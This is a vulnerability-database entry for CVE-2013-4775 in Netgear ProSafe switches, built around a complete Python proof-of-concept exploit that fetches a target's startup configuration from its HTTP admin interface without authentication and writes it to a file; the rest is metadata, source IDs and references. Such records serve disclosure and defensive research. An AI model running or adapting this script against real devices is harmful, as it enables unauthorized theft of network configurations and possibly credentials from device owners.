ID
VAR-E-201308-0138
CVE
cve_id: | CVE-2013-4775 | Trust: 3.6 |
cve_id: | CVE-2013-4776 | Trust: 0.8 |
EDB ID
27774
TITLE
Netgear ProSafe - Information Disclosure - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Netgear ProSafe - Information Disclosure. CVE-2013-4775 CVE-96476. webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | netgear | model: | prosafe | scope: | - | version: | - | Trust: 3.3 |
EXPLOIT
#!/usr/bin/python
################################################################
#                                                              #
# Netgear ProSafe - CVE-2013-4775 PoC                          #
# written by Juan J. Guelfo @ Encripto AS                      #
# post@encripto.no                                             #
#                                                              #
# Copyright 2013 Encripto AS. All rights reserved.             #
#                                                              #
# This software is licensed under the FreeBSD license.         #
# http://www.encripto.no/tools/license.php                     #
#                                                              #
################################################################

import sys, getopt, urllib2

__version__ = "0.1"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"

# Prints title and other header info
def header():
    print ""
    print " ================================================================= "
    print "| Netgear ProSafe - CVE-2013-4775 PoC \t\t\t\t |".format(__version__)
    print "| by {0}\t\t |".format(__author__)
    print " ================================================================= "
    print ""

# Prints help
def help():
    header()
    print """
    Usage: python CVE-2013-4775.py [mandatory options]
    Mandatory options:
        -t target ...Target IP address
        -p port ...Port where the HTTP admin interface is listening on
        -o file ...Output file where the config will be written to
    Example:
        python CVE-2013-4775.py -t 192.168.0.1 -p 80 -o output.txt
    """
    sys.exit(0)

if __name__ == '__main__':
    #Parse options
    try:
        options, args = getopt.getopt(sys.argv[1:], "t:p:o:", ["target=", "port=", "output="])
    except getopt.GetoptError, err:
        header()
        print "\n[-] Error: {0}.\n".format(str(err))
        sys.exit(1)

    if not options:
        help()

    target = None
    port = None
    output = None
    reset = None
    for opt, arg in options:
        if opt in ("-t"):
            target = arg
        if opt in ("-p"):
            port = arg
        if opt in ("-o"):
            output = arg

    #Option input validation
    if not target or not port or not output:
        help()
        print "[-] Error: Incorrect syntax.\n"
        sys.exit(1)

    header()
    print "[+] Trying to connect to {0}:{1}...".format(target, port)
    headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" }
    try:
        # Get the startup config via HTTP admin interface
        r = urllib2.Request("http://%s:%s/filesystem/startup-config" % (target, port), None, headers)
        startup_config = urllib2.urlopen(r).read()
        print "[+] Connected..."
        # Write results to output file
        print "[+] Writing startup config to {0}...\n".format(output)
        fw = open(output, 'w')
        fw.write(startup_config)
        fw.close()
    except urllib2.URLError:
        print "[-] Error: The connection could not be established.\n"
    except IOError as e:
        print "[-] Error: {0}...\n".format(e.strerror)

    sys.exit(0)
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Information Disclosure Vulnerability
Trust: 1.2
TAGS
tag: | exploit | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
tag: | vulnerability | Trust: 0.5 |
tag: | proof of concept | Trust: 0.5 |
tag: | info disclosure | Trust: 0.5 |
CREDITS
Juan J. Guelfo
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2013-4775 | Trust: 3.6 |
db: | EXPLOIT-DB | id: | 27774 | Trust: 1.6 |
db: | NVD | id: | CVE-2013-4776 | Trust: 0.8 |
db: | EDBNET | id: | 49627 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 21149 | Trust: 0.6 |
db: | EDBNET | id: | 20983 | Trust: 0.6 |
db: | 0DAYTODAY | id: | 21150 | Trust: 0.6 |
db: | EDBNET | id: | 20984 | Trust: 0.6 |
db: | PACKETSTORM | id: | 122905 | Trust: 0.5 |
db: | BID | id: | 61924 | Trust: 0.3 |
db: | BID | id: | 61918 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2013-4775 | Trust: 3.3 |
url: | http://www.netgear.com | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/27774/ | Trust: 0.6 |
url: | https://0day.today/exploits/21149 | Trust: 0.6 |
url: | https://0day.today/exploits/21150 | Trust: 0.6 |
url: | https://nvd.nist.gov/vuln/detail/cve-2013-4776 | Trust: 0.5 |
SOURCES
db: | BID | id: | 61924 |
db: | BID | id: | 61918 |
db: | PACKETSTORM | id: | 122905 |
db: | EXPLOIT-DB | id: | 27774 |
db: | EDBNET | id: | 49627 |
db: | EDBNET | id: | 20983 |
db: | EDBNET | id: | 20984 |
LAST UPDATE DATE
2022-07-27T09:40:26.559000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 61924 | date: | 2013-08-21T00:00:00 |
db: | BID | id: | 61918 | date: | 2013-08-21T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 61924 | date: | 2013-08-21T00:00:00 |
db: | BID | id: | 61918 | date: | 2013-08-21T00:00:00 |
db: | PACKETSTORM | id: | 122905 | date: | 2013-08-22T02:13:52 |
db: | EXPLOIT-DB | id: | 27774 | date: | 2013-08-22T00:00:00 |
db: | EDBNET | id: | 49627 | date: | 2013-08-22T00:00:00 |
db: | EDBNET | id: | 20983 | date: | 2013-08-22T00:00:00 |
db: | EDBNET | id: | 20984 | date: | 2013-08-22T00:00:00 |